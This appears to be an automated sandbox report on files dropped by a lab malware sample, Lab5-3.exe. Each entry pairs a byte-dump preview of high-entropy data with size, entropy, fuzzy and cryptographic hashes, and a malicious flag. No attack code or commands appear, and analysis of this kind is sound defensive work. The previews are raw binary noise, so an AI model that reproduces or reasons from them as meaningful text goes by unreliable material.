                                                                                                          Preview:T..u..........&.....Z:...,.tk..p..K3^..O......a..9.:.WvW`.+.jdU...n/x..y..../.*Q.B!.{....@.;`.^#Y.a..B.A.D..i!b..R.].u...SJ.s.......v:...q\.t..f....-:..B.(]k.t.......CV..'....w..$b7..(.R....'],\.....KP...st..bZ'ECx.x\...1..P.z$[B..&../j...(..Mab%.6.s......Eis.u..8A*.~..P.mX..;\....JJ.^J.Q.v....Q?.....}..w....C.....d.U.."...)...K...|..E51..}_?..p5$..C..2.A.-O..?V.~.x.&......XE.zp3..M}.B..c.`....Z..G..$0.NwBx.....^..}@......j.l...6<B...t..A.....;H...(9...L.M.T0.0XG..6.S....[.y3..4.D....e+...p.g.HR.g.j.S.4.I.5.MY...@.w..hk.;..|..dIM]'..Kx.....sU.......EL.!`......LDMUJzBu....s.q......xsE..z..k...S...V.?i2.....4..P...wd.-pM=r.|..s.*rNc4F.DfP*qs.z.....|..c.$..58`..{.|....QJo.5B....}`...w/...0Q.....*fp.Py...l&......$....5 p\.@N..ra..<.PF.+m#.....8...6.4.z1..`Q..<p.T..?r.$.1.^.G....3.e.{...../d.4J..M...6.b..FS......8r.5..[}^.s.......fZ..M...;p`..k..2...j.._`cjQ.~..g.4......;.RE..K.rs.R...R.4Ky.84N.B.?...4u..>..4)/....@.>oe.|.M.nR^B.....X. <...,......8.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16768
                                                                                                          Entropy (8bit):7.987979099036613
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:3pNDnihKiUTv2qxxpdreZZ2NW3b+/cMNDJJppHI0DSKzckAtb:5NOciSeqxxpF4Z2NWL+/cMXPa8AZ
                                                                                                          MD5:3FDC421834F3674D0E49C5A32CB7BDDB
                                                                                                          SHA1:D9AEA468DF0913275242AA8952A0086FB8AC7EB5
                                                                                                          SHA-256:8EC210410E189D37629205702A6F9AC3B61DFCCB6FBA2A9C77926CC0725B02BB
                                                                                                          SHA-512:A52CD3D30DBF4F1665C6A9E84EC0DC958A6FD04FF1E9825801982A5C034413018D2A4BC86DE79119087F6688EC272D1D4FB1643D16DFE1DE91EBD24A1A39FF69
                                                                                                          Malicious:false
                                                                                                          Preview:..<..P1.k.3.o..I.\mzj&..Ku@pB..g.a.ux>O.............X.7..\q..<..KEM.k.k. -....2mv$...._.Z.Cj.1.!..)..{.....Y....Y!....+.c|.J..-....~4...M.}..c9....v...zG...r..F..*.......n+.*$.......{7....\...A....YS...8o..}6......X.rW(.>......h%.>....];R.Q...J.y%*..T...Z.j,.^C.....Fz..H[*&;...i.Q-....58....&mj#C......H...q.^udV{WUM^ ....8.n.1=..]8/V.....d@..r...M.-...&..{..U)#....>......)0.u.OL."....Y...=.%."..d"V...A4(...V.[V+..'.........I.E..#!rN..:...|.7..u...........4..'...yo..Q7bB..K.W.....L....C.r.t.Z.1.ir..Y/):.fp.#v.ZC.....f.^...(...x....e...i5a.T.......Q.E"_..,.^.,.....}./X.u/.[....;...G...........1..e.O..8.....N..........H..c.B._t..+U..}X..'Ze9.5.n..'...9..w..!.?.3.^@....(.KM..v..y.v$...Tj.N... .(..K...-n}.N.....Q..N....H..z........T...^."dp.D81..&.}.3`s..0h*._...MQ.._.a......(v>.WU>S."......K.S_ #.X..<j...;.^....).^.iO8..dy.#..O...\f ...*.....@0.b..K,4.)O..i..hb...L..jF.H.....o..9..)`.k..,.1}Tf....YuY,.@.W../.%.(...U..u.2.|..5.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12304
                                                                                                          Entropy (8bit):7.985471264392142
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:WgxEZsCsxrS4zqcXVkNGM3X6ped062yNtFNUwykEAdOnd+hC0Cb:3mTAStsqX6Eyb3k5dOndNtb
                                                                                                          MD5:272B0FD61901DDB1ADFA5D8F13B311AA
                                                                                                          SHA1:681E46B2D9A0B0EDBCFC207131073FE5B51B1FA7
                                                                                                          SHA-256:088BDB45E4157BE4898D7516456F5A0AF9037C0346FA7161E544A2546236C8BF
                                                                                                          SHA-512:0EA6A11FC91022521BA057EF03B34A882D59E0A2AF2309807ED8ECD22A2943744774C20E92BD72429A65430F11B4BACB6DDFDDE958F5F62DCB00F88001CFCDBF
                                                                                                          Malicious:false
                                                                                                          Preview:.?-.....y.4. ....".M....W......N..%.......t5.LY...ZB.U.p>.D.+..v.Klxi|Jl.....S.....l.}...........B...._[_-.U..^VY........./.m2...`.@....1...:..X..[..}nT..x.1..s...5.Z..\._...=....K4...b..)c?B..Gl.....i..ZX....O...PH..t..tj.,U.L.Q.M........#.U..W;q....wo...7F.P.....G...LJ6..@...,vE....~......$.4.&Z..._"....t.$Q.x..Neh.m<.d.........qh.iO#..(...D.@.T..c.`.zb...9js.9.9..-.A.......l.....Y..X..j|.h............]K.t.B..:..5......iQ..........L..s....o:...19B.....u..5.....kp^..r.v.r.kn...1OL....G.....x.@.%. <..kp...bWW4.....f.a.b(.\.4.\..Q..j....d...'...*.F#...d........%...VR.....6.9.a.)...O...oo..Ow.Xr.....|....Z.J..].t...I ..7.A.nq.Iqs.Ik..$<...#.....&.`)....c..&.#..l...b+k..T.>..~..g.J{....9....f$.0..z{....7=o..w..9&..y<.RT.......*)hE.|.R9.Y.H(/K9.#}...D..;B~...=3....O..>.|.n...=.wX.Ol.......^CF4. ..W.R........w..+@..t.,W..._."..k...i.t...E).Li..=.:f..*..X..4V._]$C.....1W.JG.u..C......Uwe4'?I..t-.x@....li.).4.h.Bi.k.k..+..A.\r...)..?.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11328
                                                                                                          Entropy (8bit):7.980533620264871
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:onFWEfpBRx1YyJyEXjl5PeV3X4ThMQD1RGaMFdGM4oVOOx2GBdSHsIKuClhR0Cb:2W6Jx7mtaGQD1RGa6AwcERXIGhRtb
                                                                                                          MD5:617D3A64AEABA4701ABDC3CF12836BF8
                                                                                                          SHA1:BE888BDF5B2E1A6E3327C3A5F67C0E449AA97390
                                                                                                          SHA-256:45D4A42AC5CFC99C93F846BF0294BBDDB517944232A0C8D83A3C41DD00C2D1C7
                                                                                                          SHA-512:3F719F4B89E86B701DF2B733CC8E225BB75433BCC49481B2680572E28CEA894916296D616B87D4A600B26C6ADDD9FC4A63D84FD3D29DCB169C3DA8D5C57D15F6
                                                                                                          Malicious:false
                                                                                                          Preview:!.)..?;...u.j..4..0.Fj....}rN|<.........i....2.d..I..G........*.....1.='..(.l...X.R.\2~6!'.N...g.......U..$A8....T6%.>.....K.....r.,....CnsN".L..m.6.]...;.....w.....2 6.6.......x...6].8...V...yTz.-.}.k..-...&..".H.. ...cy...D..$m....QHe;5}..V.bz.....G.E...'..{.$p...b>.\4v..o.......x.....6G.#......?G.U.REtE`\..8.d@.X.y..^i%.H..x.H.(.#/.b..&..2..].Z%.....D..<4b..G.. ...?.oyO!M!....f..............a.n.O...._b!.h........z&Z...p.^.......*,vq..#..SyZ2h,4.......F.4...t2@./.X..0y.....y0S..}3....?5...'..X2..N.k...R .f/.+.VA...2.O.j. S...e...t. HZ..k.T..w.....JZv1../>.p.~;.1.X8.h...V...%.*...L.D.8I....Dq..@e..U=C!{..X.. .6d....t7`%.[).@..M.>Iw]J.4.;.W...a...d.-..$...3.Mb........+..T...-.A...`......3G....|.M..>..[d$..`q.t.z....a..6...w.l.@..p.Q..b.O..bz..9X..s.c..9.Y.._|...,..y.....V...!.'77y%I4..u.U..3.r'9...{T.g9..2$8.".u.<..)....K.....D....e.m.......'.D.v....jqR..A.;g...s......;=..4..q...:t......#.el.WN.......^>./Z.o....(..J.l..".T...G0/...xP-
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11616
                                                                                                          Entropy (8bit):7.984148823411717
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Xj3AM7V/a/jI107MlisD57j31QbPyDphFFUoLlMVCUOFhnlR8zWIngYTMU3qm9h1:XkMRaU1+sDZ31QLYjcoiVCtF3aK4TMU5
                                                                                                          MD5:035CA924EE5818479DC77D671A280332
                                                                                                          SHA1:2CFA2808D1EE6E2C22AF72AE9478E6658C5B4CE6
                                                                                                          SHA-256:8298A82F04ADD22EA2C367CB7E7A8B4E35F038E827253030A6397BDA4F259DE0
                                                                                                          SHA-512:7DEC3C95F58E9B6EBE3148B586914732931B1D634ADE953A72FA1CD489EBC1E2755AF94872FE9DBA424E506F0416E8055AAC714AAEBBA41E2983755F4E01C7D7
                                                                                                          Malicious:false
                                                                                                          Preview:...Ko.;.N.UA......e..h..}1.6......J..K...R...K....O...<<U.d....uv?...L...k.[.S.%....R...%.qK.6..u..&.8].5.~.....`..^..H...J.~H...q...5..\..=.[.n..n!s..G_..RF....2..y.Ni...S..8<.O.).2.H.I...<....=.UR.7...iO.o..%R<g.........NS..c.8G..k.8N'.......hIg.e..vW.by.....A.....Z...*....c..fU..1.L.Pa...d..>. ..../..N8....N1.....o!...y........q...9y..v/)...S.....d..=J......m.0(.0j...TD.d...v[E..|(g.A.mGd.....$....b.|v.}.&_.-..........j..L.v3Qo.U.H..o..i..&..m...4_.j..]...n.......V...{..Z.+T.....tt..3vC......1...m....K.1...v.X(6.C:v...[W.^..S....."u......h#....X ,.e,Y...)D.p.dg....Xp.].a...G#.K...}..?..n-...dU.W.%s..d.I...+[.F.L...F....p5....n..%..y...:n..:.x.p..Z........hy......a.@......J.....Q.....2z..../.^..k..P^I..V../.....u.(.h...,b.t...1_.zOZT...2..=.r.Y....<.P$....?.p.n.^_T...K5m.\..%A..|.i.d6h.j9..[..W.2..I.H..x...I..D.2.<.R.3.4;....TA,..L.\.|....*s.3v.n.H..p`.O.).y.N.kl.6...%.1...&..U.7N..5..j...H.<...., s....i.w.Z.......:.^..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.930982179537493
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:L5Xrj9ljBd+jWqRl2oFJU1OFR9P+MYehlWV2WHfUTid3hBaUoSGFcmeykEdEElUJ:L5f9ljYXC4FR9/YuWIpGx0uKeY2ElUJ
                                                                                                          MD5:8DF6F558E62B4411A12BA0D71BE7D1EA
                                                                                                          SHA1:B67ECFD7ED42DB88231869A6F7749CFAF7FB7F10
                                                                                                          SHA-256:54358C1FFF7F9D5C3E65333AC54CC8D968FE4FBD8C14A1BE921EE0558D8DB864
                                                                                                          SHA-512:FBAAC9BB08A051E4AC8F25156211C83D7D95EB522BC498EDD88200C61A126D45FC5CCCA408DC786646F3309B8B47E9A4E2CAFAA04F00B8AFA16EFD747D94DF05
                                                                                                          Malicious:false
                                                                                                          Preview:.F.c..K.u..&."Vo....3,wS..e..8S._..z.s.ed...a..oDO.=g...6vB.e2vs.&D@....R...@..r..J.9.+D.kE...(.......Ux.Z-df.D..Z....L.X?.c.X.......;\&.N"l..R`.R..a.....;..q ..[....i..pY..a3E...8i.<':..........1.^..$o......*+.L.-..@7..d.2..:.F;..Y..N9".0....$..]..y2.....t?..R11t.F.C*.+~..YY........^.0ae.g..[!..}.x..Z9......g.5.V.....l....7.+$..l*...i...-=.....B...S..#).;....I...`.:....1.u..a.....g..^!*V".._Z~R..C.2..x.o.2'Y.m...{.1Qq.............2....N..L<.........DU......J.i....,7b.t/.'.....f.k.......H....%..M.2.y.......g$...yB.....U9f.!u.5..;....$..>.t...W/...../a.....*Y..xZv..G..d...E...-....(......i;i.W..JI.....*.*j..P.<.EGw.....[.L...r..V..w..q.[.?.'....1?.J{..Ch.G..`.....(./=g..U.nh.3.Y["..{. s....eg.K4.r....9Bg.E..,.....v..i......A.z........Q......)..;.....u).9..~.o.tfx..7P.<#...*..&1.N.....?..h....J.-+...X..(3.A....e...U...\....lw.Fv.%..TB .i19.de{..".~.....=.pT-U.q..<....|P........Y._.........r.M#.=./....O| .h....*D.....g.$B.....s..G.;8V....e....O.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16800
                                                                                                          Entropy (8bit):7.9897130317622995
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:x43j0RPHrduATqqX8jL8VX5Vvg4M/09YZLUW8stb:K0RPHU2MWb44MVZ4W8sZ
                                                                                                          MD5:794C67655F03F0FFC183D09C2B8E65DC
                                                                                                          SHA1:13DFA7C77CF2A7952027E2BB12799F04A8838411
                                                                                                          SHA-256:357EF9F1C764A2B122B5E136BAA8D07F01B520ECB29D81E7217FF14E8978BF07
                                                                                                          SHA-512:CA50479A8568067C0F080938B2275BCC697F901D0EE26C74D0DF357F2ACA99034EFBAA6F1B2875A46565777F00886EFDB4AD887963FCFF8FD6F946A59D2E0CF4
                                                                                                          Malicious:false
                                                                                                          Preview:l/.c..GtF.y....I....9.c.....aO..X...4....m`.y...K(|.~..J..(..#S.u;.....*.83C..[R.{4OT:.8".....m..9.7.d.bmV.JXWsxW...MbS..'5;....1....F.x.....Q..g...a..snrM..P...C..D....>..9.g2.6.#...!.....m:..$J.k59.....G."v|..y.....J.........6.....ZB.!?..<.{.......'.....z.r.@#....;.a.z4.NN...wsRAi...@..n..O...S.d..Q`E..z.+V.....5..%b.(K..E'...U....YpfhG.sO.......d.Z5A..O..*..v>[_f$.\...,;..O...em..[..H.!....,.<..0.a.....dX..Ge.m..g.1~.'...<.Np.=.....*.....a.....C..V...J....O.4../......-.;..;C..S#....]...x!.'.+..".1.OOJ.....7.E..e...&G.&...,..1........P.7...)9....d....\.d.N?]..$(+a._....1R.........2J.....4.S..Ah.itf.iI..G.W..X........j"{+..?.+.R.A...W.&..0.L(a.....!WL....R.X..Go.3.....].....:......8.x..".*F9.f. .i..P....<..<.k,..4S....#.S....>.......^.m......b..6...E..8F.88.....".!B...&.1..#"{.(..X....?n...........W......k-..,....1.#.8...-.E.!K.^E...>....,.e....(s..b.L.:._..Q.j.Ik.2.y]..(...5.B.>X..m.5.z..9C.....3..;.6w.z.....3..7.Zx.......k.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10448
                                                                                                          Entropy (8bit):7.981248429364417
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:LZx3SJOxapmO1YJhtvP8I5fDrfOx65Nw0ggRcSjdm4eWBYKB0Cb:/ikZO1gP9xg6520gguSjpTYUtb
                                                                                                          MD5:F11E9592F862D2D6C4DC2718F2B6FD10
                                                                                                          SHA1:EAF5490A3BA1D7B40C0935EAC98295BC04843C54
                                                                                                          SHA-256:B6CFF86638E750DB34DB17DD0D4FF3DBB0753D3B501F61A25C94D10AE53DED0E
                                                                                                          SHA-512:C8E01CCBB5CFF986CBF6E43B285750F96255A2C0BA1DD8F7A21BE5284168BEBC3B1CF58939968560BFF8CBFFC86C3ADAFD901CC658D1F0A6BD30CC97A51E2BF3
                                                                                                          Malicious:false
                                                                                                          Preview:F.:...n.!.nB....r.....tbZ..y.3......H.pwC<.....k..YA....".k..>.H.....y.d.)s~c#C....d....<..JP......)...>.%.q.c..`.6..vU.!4.....u..t....2\.U.+JS...'._.wY^q...T...y.KIN.V..o@.'.4.f..y.[e...A....5.f.E..B..F0:.2....._....`.....M.Z..f.n.......!.l.....*..O...O.*..(-...b3...}...B.2."*......6..).....o.A.."..!D..u....Q...k.~l.......o......*ccz..%K.3.d.2:p...Wjtux.....A...PR.n....g.x0B./.i]8b.yB.mH.U...&..#..Q.r.a5..!%t.5.u...).......")..tu.]W_...7T.G.X.5..w...T.@.(l.....>3v...<.w.......(.Hf....2.L@.7....3Q..t.-..^...fFz..`e-}.....e..3.k...*b*G.....J..g.c$p......q...G.f1.+....j{....i.........e....BC...+..%......i+.o.O.W!..f.....a.A..q.%..1..#....^.Yu.VK.@.8M$^Y.{=./.p>...e..c....[..yi\./.yM...C..f.....u=@.ja......O^.]-.S...q..E.)^J....5..Rk;.<....5.....T..;......}..|>.D../.KB.....j.C.)..a.*...!:..O...!.l..;U/.F..v.Vc..\pB...m.O.aM...fA0.iE.N.(.....G._....v|.j.4..j....(A.v6..0M...c..q.../...1....6N.....'D.S.q..0.....U..D .r...D.... ..\*@.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10240
                                                                                                          Entropy (8bit):7.9816517046038165
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:m7UyFdWxNejt106Bwr0Vlmg6/XDLHalPXG1GcWDjVboUptEoF20Cb:alFdWrOBwKcg6/DLHal+6Dh0ODF2tb
                                                                                                          MD5:F3C8AE25C63FA86A78EC395D052EFF3C
                                                                                                          SHA1:0B1304CABD5A48583F8873C87BA2E39D9B1DFF80
                                                                                                          SHA-256:1118ED2920D2DAD87A1747E6EFF176FA7171A3D5D577AB5582B600D4D17A223F
                                                                                                          SHA-512:0A4A37498C4F15EDDA0761DD2E79022456313AE11254A55E6CA222F939AB62E49EFF4365D98F43A7C8348F1A64B8939DDE79345C2429776C5094D0E1CB8FC4C2
                                                                                                          Malicious:false
                                                                                                          Preview:..Zc:a'A..c.P....%.H.E..?.....".....]Y...&..),..JI...>........P..z...3=#.n..).h..l....NB...Hx*..3f.H.").~1../z8>..,.`.:{.......A.....Qb....)5Zw....q.K.o2..S5...Nz~.=.F#g...;m..JR../...".....[..V..._........E.YcE.k.z...:7.......F<..U.J4.'...W.=..5....${.<..H..U....hb.c.%....=..s....2......=...b....:.zY....Q..d=/>..B..~.F9.S2....s..f.i.swE.....f....IX...[}K.P....!..}...7....[.H|`........@..I..'.....a.Gw.2C..,Ug..Z.B)TTU.....e.;..lk...../.q..._.u.,..w..3...),.C...d.).7.$6.`.U..g:...A......!qc.(.Q..^.T.....'..i...e"....&W%<.:....@.k.7.<.........]..g....W..l..."...`=..;."..:...}=}..d..#.f.Z.h.~..7l...rd.{...!\X.....)G,..XX%e2|..zb..e..D=m.6...V.5O.k"l....@...Y%ALq.f...L.Zn..*d..Q..ld...y/.....{7.tQ.....#r.#..{.."I..${F.p.8HqE...........O..d..[..t............,-.R..&..jLf.k........Q.....$.."a........j....d.4..xuq...zF..w..i+...v(......B.(W...%.y......B..V./.;..2..0 ..Y.N.r<.1.i.....L..f%...u....>..Qd.oD....y..&6-.mk.VC...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):183280
                                                                                                          Entropy (8bit):7.999044996295305
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:OP9AhEXwpXj3RPcxNvMs5a/LynuSKid8CH/sH+quu7MwSLnY+ngkdaVYP5118WEM:OKbj34NvMWunid1/seCgPLY+nDdwKv1F
                                                                                                          MD5:1A2BB47AB5984BE382039CD585E49B63
                                                                                                          SHA1:FB184625462E6DFEF399CBF09CDFADD01C9F0425
                                                                                                          SHA-256:61E99674246790157C85BD7B1E03BF2436CB88150E3196EED1DFC759E7344039
                                                                                                          SHA-512:7F8F1117698E7638F5F1898530A4A95AAD8C11268EC6A9D35A4B4A05BDB40A4E2544F7CE1EC4832A4CD63A7B184FF31386610D1904AF5D40C5736FC41FF6541C
                                                                                                          Malicious:true
                                                                                                          Preview:."..3..<[.P.ss?F7.l.7|:n+.s2.&.......].."..)C..d.J.H....s.F.@H....V.K4...p...A....a..2...'.............0.e.......C....I.....~....1`L..B#M;....x.V{..3m.[.~;..X.-....f.f.T..y.)zmy.A..p..As........v..x*4}b..o..K~%...c.~..8w.\u.vS6N.....l.M.%x..(.b.e(d.^..F..e..9.2...h..m&..+........ad.2..$6...yy.j...qDv...Mr...UT....A?._j..\...2..+...&..I.%[.......i...y... ...CFr...u...9..;...m....;.9.T..L.,.:y....u..,..0..:..w+J.....r.#...J]....._..m.T.[q..k....Y>.....a.d....3.LI.fR..>...q..F.F9..c.!Rj.a.&.|e.X.(..[Cr...<.<GTS.?.E....?M....b..+..s.(.66.&..k.p*....w.N.,....H......O..f[..V.-1..c..K.{...d.t.%.....[`. .QB_..@A....|. ...?...'axx?s.A!...../..}&.5...s.:G.f..[.-6c.K.y.H......O.__.=....@......N...U..l0?.?[....h~. .v.........Kv..5......M.p]....;`%..l.z..e=.....!..-.82E..n\........F...:?.5."..V......2A.>..1E..>|@.....w.....].*4.|R..-D.I.."vUnwva .v.dqY5*.z.w...#z....*/.fr.m............b...A...g...<.}........p.'......=s"...Pz...%E..._.B_
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3344
                                                                                                          Entropy (8bit):7.9508757293532755
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:lzr/JjqisBhIlhcSFmQu7+fm40KGx0uKeY2ElUJ:lnJjqklOSPe4w0Cb
                                                                                                          MD5:AE22ED848C06F01AB0F1677D6839D2E0
                                                                                                          SHA1:E454C63DDA3D9E44C01B728023EA04458A82BE8F
                                                                                                          SHA-256:F540D1816FDE0D4912BF782FED22CF08EC16FCE75EDE5B9F85A7EADB64CD7DEF
                                                                                                          SHA-512:DCEE25D968B2F01B5206C2E40401E7A308D912D0314798898A8D255B7F4B69DBFEED28FD1F468C668ACA8D952B4520CD749916503F00A116BE247654CF297C9A
                                                                                                          Malicious:false
                                                                                                          Preview:.wj...O;p9.....6...".F|..%....!....w...E...1..g.g.QR.UD...P.L..)...`#.......5PN...m..7.......Q..q.....b..b....l-s..r....J..U.7..T..4...X.)...n.M.k..<X...?..M..m..7C..].......@5n[...x0/..hFL...V..c...rK..d3.!*M.InT.*.S............"..})........)..W...~...\k_..~u.v.....*..F....Eb.B .n.....`.....l......._.A.tD..fG.._tG]!5."yuP[.._.B..u./...w..s...8.8.-.x+!w..H<...dr4.P.z.`k{_.V.9,.S.&6.O..`N..<d.Tn#o....o.p...<..=...'....[.0@.2.(.u.+.m.e..)"..,O....bt..><....Z....N......Z.....pc.s{..V. Pf..|e}..|;....m.m....+....[....I....T.@.j..........E....o`.r...y.hb..z...R.L.......]Xv.Z>........OE...a.....du$.... B.`L..4...-..Avpn..p.QCM..#._...Z..RXqO....-..=..4=LdUz.bFGB0oDMe^|.$...D.&....H.."rG.....&@8..>O?N_.(o.s.[S.....q....P.!...(.2y.4....<c.01HEj......(.y...N.w.@.H..F.....Q...;.].....e.j......n.....Nr.E.\.]u.B..].F.|.....!4..x....`.P.X;.q..8.b\Vd;......ge.I.z.n]...]>...,d..{...<...../...b.0..F.........UL}..q.%...<KK...d...Qb.F.l...}.aN.g.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.924244154005476
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:h4PNa1tRsieE0HQ2N/bdg6QRQy7XYGlDSSa3ZLHfUTid3hBaUoSGFcmeykEdEElk:h4UhNee+bdgiy7XtDRa3ZYGx0uKeY2E+
                                                                                                          MD5:FC37607A3E8A9160FE47C8572E1B6859
                                                                                                          SHA1:687165A48F83A0FF808AE3F88017D19BBC00F2E9
                                                                                                          SHA-256:17D78D2FDDC95FBC56E691903B3D0937169052F962DDC89F9DD286B7BC365680
                                                                                                          SHA-512:827C9BBB34AC539DFD12EE013C1DE544E9DB369879AEC8D365E01C8127985379F18C7365D869AAC0112749A81E02554373723FA2F09805E33B91438B198B673E
                                                                                                          Malicious:false
                                                                                                          Preview:V...[.J.A({C_..A$..r.. ,...A...o.&^..k..W..B.....$..LM..M.bC...]..Kk..)..{.q..n/.}j..j:N......1lY..l...6..lv....Uj\=...P...B..>U.>!6]....9.1..N.......h.q3..|..5...........*..H@..s..0P...3...b...y'1..........#.V.%...R..N'...y..N.T...|.B.M..!_P=.QH..qZc.;1z.+!....\...a0.......k....3.^........PU....3.EXA|..Ub:%4..=.Z....a...I^$....k.n[W.6e.:...N...(....Q(G.......Ga..j.t..../8..K..Fy...HBD..a.Y...m}.z..A.Ps..=..>...B...Y$..%.r..(..?......UL....Na../.,...(M..Tt...2.. s..... .....@..S..T...{._..l0...p.m:.....YQm..P...^..G....dr.:....QE...`)B.I-..Y.y.<.:}...C....+.y0X..).+.\........6....$P...sK=.JO.;......X_..I.....R...J.:.H.....J.X.w..B.(..A4.m..[..h..t....|y(C~"..].zI<..^....^....H..G...q.B..&...<.W...1............t[..]9..:.%.k....:..g.q!.q.<.P.".....w.w5.3.p.5VI|K.YM..........U~.......\t=d..=y.....VL.'.....<...*.T`.Y) ..m3.".h5k.6nH....2...=../.....(.>.......J.9 .[.I..n..;k)=.ff]...Z.V...h...a...b...l_ n.l.=....)m.y.-......).!s.l...q
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6096
                                                                                                          Entropy (8bit):7.973324161480087
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:RJYv3Covh+n1bpwiUOO6Mj1IAjs3yLD7CgPI2Qt74Sg6fb+xGx0uKeY2ElUJ:RWf/s1JUX6MjGAYiLD7CgPC74Sg6faKZ
                                                                                                          MD5:66A275BA84B745AE9696178EEFA38389
                                                                                                          SHA1:0392E43406EAD66FBCAA7E28331B796A976FE45E
                                                                                                          SHA-256:C870595B9860BEE471548CE623226469B4DCD5036720D95449EF5988734E6C6A
                                                                                                          SHA-512:DF9CE6DA43B16805F459A4D9B9DBB49CFE1D0CD658C16858BBB28A293C2B47138C00ADC7204AACF7A280D9A0EED0EEE543E128A64527FD189291FCA0129BBA6C
                                                                                                          Malicious:false
                                                                                                          Preview:.......>O.c&...$.C..@.q..*A.>.b>.....E..ER......v..WN..=EW......q.!.N(.O.?=......U.|-.%..i........rC.....:..Y..4|....CO.&......3R..O.LW|u56.z...._....Di..W...-....$..N&.%H,....3.C=..........*.......r.J.)N....r.^..'3`..2..fk....S..6jy.|.kud.+....`..lap....N..C.1..;.....Q..U...J>...L?...rH..LZ.o$..C...t..a....X...1,.3.h[;..0K..+....X.f..(P#0..O.JL..a....B.KW.g...&....1.PW]....K..M...U.D)~>..D+....pf.v_...-9......s+.X.....G..?N.Ya.*@H..._5g..om.P..#...F:...Z...0.$.........k.|.D...g.....m...+]..D..q....DP@.....1.e].0(x{.I[.... )2$.-v|..,...k..9.......*z..E.c...{...".^....,.}../.g..P...q...c...........;......{E`.:ed...Za.2ynH._*..V.R...*..{._.B...$.j6Y.6..F2.&x...aN..5.CQ..B.^:nF:`...4.(l..... F.u.b.i...{:=....l..t&..cn6....W.x%....\..'.s....t2"1,g.(=.8..%...h..r)...)+.#.u...U..b.p..$.....k$.P.Hc..|........}.\.B?.b5..F.x.%M....O..$.E...Z...K....*x.0..../m....f*?.A..{.4.z&..<..R.v..e...h..a@.^.'..l.i.f7.f..,....u..2...r<.4.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.9282216692975345
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:fTFc8b2pBydXufl/ey1x3ZBTpg6HfUTid3hBaUoSGFcmeykEdEElU92i:ry3v+Xud/ey1x3SGx0uKeY2ElUJ
                                                                                                          MD5:1858851667316B6192CA358477139040
                                                                                                          SHA1:8A70A06A498B77C8A0E609B5882CDB16858EE9FD
                                                                                                          SHA-256:EFE07628E8011566F386CF6B6BBB1C94A8931227C56226CD1E6FDE189B307349
                                                                                                          SHA-512:17C3D0D42D43DE521508BD33A55D70D1AE26100D60DAFD25DE765283836EEE2619B59A5C02FB37926D115624747D0F8B1EF1FEB752EEBD05CA686AF418279CC0
                                                                                                          Malicious:false
                                                                                                          Preview:3..Y....O........4..pe..?Bdg.Y..{d.Xk.(O.e..*...i...C.2......5.dNF.0...{..n.G....>...%....}....)..d..q.C5...>e.].....=u.xDu.Y.P..\&N..U....".... ...s..9....".2un.....bj!'...E..#\.......G.sX.8H...b.z.[.}...f.!.]....?Tv...G.<...S..o..q...2V.pb.z.....~....>.=.p.W...x..`.zxAl,u.J...F..L_.IE.n......6..~K......oG.gQDX....'..K...b...V..... ..J....(..r|.N%..G.....H.$z!..#.....F8js-1..7.......\.."..Du ....C.'.mR...XN.,.5....%'..}....=.@p...Z.U..{=.V1..K.|L O...8.Z.....,W.+.K.>.......L.........8i..Rc...|.K....#..iC;@Q.;.o...+..v.k.....H..4..~"....Z.oR..>j..:g...T'.7z8.C$...s-..U....2..,;*.jG...K........Hyvy.d..X.$8u."...,"w.d^..........5.._...F.nr.t..-.U.?...$u....s.I.e{93A<.>..z..2....M.&,.....SG...h2.l...a.3.,.....;.*.t..^6C...:...1.\{o...A8.3p(*W.0....D2...$tLc.../...~.....x8..:vz...t."....?....}.` .#.].L[):.ow,&Q..L2C...a..cQ....X..u.g".;_!.^.|cr...9.)..w/.P.A.|.j7.Y.ja....c..}.$..P&..6l8=0........+.x&gu`...6....G./d.k......3tZ9x..N.qz.Y......8=
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
